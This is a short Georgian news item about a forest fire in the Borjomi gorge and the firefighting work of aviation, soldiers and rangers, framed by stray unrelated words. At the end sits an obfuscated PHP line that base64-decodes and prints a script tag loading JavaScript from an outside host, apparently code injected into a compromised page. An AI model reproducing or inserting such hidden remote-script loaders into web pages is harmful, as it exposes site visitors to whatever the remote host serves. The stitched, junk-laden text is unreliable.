celsiusi
ავერსი შნაიდერი

ამ წუთებში ბორჯომის ხეობაში სალოკალიზაციო-სალიკვიდაციო სამუშაოები მიმდინარეობს.  ხანძრის ქრობის პროცესში მეხანძრე-მაშველებთან ერთად ავიაციაც არის ჩართული. ამ დროისთვის, ადგილზე დაკვამლიანება მნიშვნელოვნადაა შემცირებული.

არსებული ინფორმაციით, სამუშაოებში ჩართულია თავდაცვის სამინისტროს სამხედროები, დაცული ტერიტორიების სააგენტოს რეინჯერები და ეროვნული სატყეო სააგენტოს თანამშრომლები. 

შეგახსენებთ, რომ გუშინ, ბორჯომის ხეობში დაბა ლიკანიდან 3 კილომეტრში, ხანძარი გაჩნდა. ცეცხლი ამჯერად ბორჯომ-ხარაგაულის ნაკრძალს წაეკიდა. გუშინ მთელი დღის განმავლობაში ცეცხლის ალში უნიკალური ნარგავები იწვოდა, რომლებიც ეროვნულ ტყე-პარკშია დაცული. 

453
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");